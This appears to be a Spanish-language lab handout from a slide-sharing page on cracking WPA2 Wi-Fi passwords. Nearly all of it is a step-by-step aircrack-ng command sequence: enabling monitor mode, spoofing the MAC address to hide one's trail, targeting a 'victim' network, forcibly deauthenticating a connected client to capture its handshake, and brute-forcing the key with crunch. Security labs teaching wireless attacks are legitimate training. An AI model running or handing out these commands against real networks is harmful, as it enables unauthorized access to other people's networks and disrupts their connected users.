Laboratorio hacking de contraseñas wpa2 en redes wlan
Click here to load reader
-
Upload
jesse-padilla-agudelo -
Category
Technology
-
view
2.087 -
download
2
description
Transcript of Laboratorio hacking de contraseñas wpa2 en redes wlan
Jesse Padilla Agudelo http://arpanetblog.com
Laboratorio Hacking de Contraseñas WPA2 en Redes WLAN
Duración 60 Minutos
Requisitos 1. Computador con Tarjeta de Red Wireless LAN.
2. Sistema Operativo GNU/Linux (Recomendación Backtrack). Valido en entorno de
Virtualización
3. Aplicativos Instalados: aircrack-ng, macchanger y crunch.
Nota: Si se hace uso de un entorno de virtualización se requiere de un adaptador Wireless LAN
USB. Dado que las maquinas virtuales crean sus adaptadores de red como interfaces Ethernet.
Desarrollo 1. Abrir una terminal de comandos.
2. Autenticarnos como súper usuario o root. Usando el comando su –
3. Ejecutamos el comando iwconfig para listar las interfaces con soporte para conexiones
inalámbricas WLAN.
4. Ejecutamos el comando airmon sobre la interfaz de red WLan0 con el propósito de habilitar el
modo monitor en esta. Comando a ejecutar: airmon-ng start wlan0
5. Si deseamos podemos falsificar nuestra dirección MAC para ocultar el rastro. Esto lo hacemos
ejecutando los comandos:
a. ifconfig mon0 down
b. macchanger -m 00:11:22:33:44:55 mon0
c. ifconfig mon0 up
6. Iniciamos el proceso de monitoreo de redes inalámbricas usando el comando airodump como
se presenta a continuación.
a. airodump-ng mon0
7. airodump permite detectar la víctima, hacemos que nuestra interfaz de red inalámbrica solo
escuche dicha red.
a. airodump-ng -c 11 --bssid MacDelRouter -w nombre_archivo_guardar mon0 (no
cerrar)
8. El siguiente paso consiste en capturar el handshake de algún equipo conectado a la red, razón
por la cual este tipo de ataque realmente no ataca al router inalámbrico sino a algún cliente
conectado a la red. El proceso de captura del handshake busca desconectar a un equipo
Jesse Padilla Agudelo http://arpanetblog.com
presente en la red inalámbrica y esperar que este se conecte de nuevo y envié su handshake.
Esto lo realizamos ejecutando el comando.
a. aireplay-ng -0 20 -a MacDelRouter -c MacDelEquipoConectadoAEstaRed mon0
9. Comprobar si capturamos el handshake, sino repetimos el paso anterior
a. aircrack-ng nombre_archivo_guardar.cap
10. Al obtener el handshake procedemos a realizar ataque de fuerza bruta a este, este
básicamente busca tratar de generar con los datos obtenidos en los pasos anteriores un
handshake similar probando diferentes tipos de contraseñas.
a. crunch 8 9 abc + 123 | aircrack-ng -a 2 nombre_archivo_guardar.cap -e [nombre de
la red] -b MacDelRouter -w -
Nota: Como podemos observar la clave para que este proceso sea exitoso es que la red cuente con
usuarios conectados de resto los resultados serán inviables por este método. A continuación se
presenta la topología de red para realizar este ataque.